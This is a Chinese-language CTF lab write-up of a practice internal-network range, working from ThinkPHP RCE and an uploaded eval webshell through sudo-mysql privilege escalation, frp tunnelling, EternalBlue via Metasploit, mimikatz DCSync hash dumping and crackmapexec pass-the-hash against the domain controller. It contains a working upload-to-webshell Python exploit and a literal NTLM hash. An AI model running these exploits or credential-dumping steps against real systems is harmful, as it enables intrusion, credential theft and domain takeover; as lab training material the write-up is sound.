第一次打靶场,第一次接触内网渗透,做的过程中看了很多大佬的wp,感谢:)

https://blog.csdn.net/uuzeray/article/details/141316323

https://xz.aliyun.com/news/11561

https://9anux.org/2024/08/01/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83Initial%E8%AF%A6%E8%A7%A3/index.html

https://wz0beu.cn/%e4%ba%91%e9%95%9c-initial/

2025.6.29 终于内网穿透成功了,打靶场成功

这真的是一件很酷的事情,我大概都只是照着师傅的wp在重复,要多学些东西才行呀

基本流程

用fscan扫描靶场ip,有thinkphp5.0.23RCE,用工具一把梭

6

添加了一个webshell,可以用蚁剑连接

读/root目录要提权

linux sudo提权方法

mysql的sudo提权

1
2
3
sudo -l
sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'
sudo mysql -e '\! cat /root/flag/flag01.txt'

1

拿到了第一个flag

上传fscan扫描一下

2

172.22.1.2是域控,172.22.1.18有web服务,172.22.1.21有永恒之蓝

用内网穿透访问内网,我用的0.44的frp,因为不会写frpc.toml

附内网穿透教程😀

内网穿透

测试访问平台172.22.1.18

3

后台rce:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir")
print(r.text)
print(filepath)

运行代码的同目录下应该写一个1.php,内容为

1
<?php phpinfo();eval($_POST[1]);?>

运行脚本后获得文件上传路径

蚁剑配置socks5代理后连接,得到flag2

4

这个一般直接拿kali的msf打永恒之蓝

给kali配置socks5代理

vim /etc/proxychains4.conf

1
2
3
4
5
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

成功正向连接

5

mimikatz搜集域内用户hash,再用crackmapexec打PTH拿下域控

1
2
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
1
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"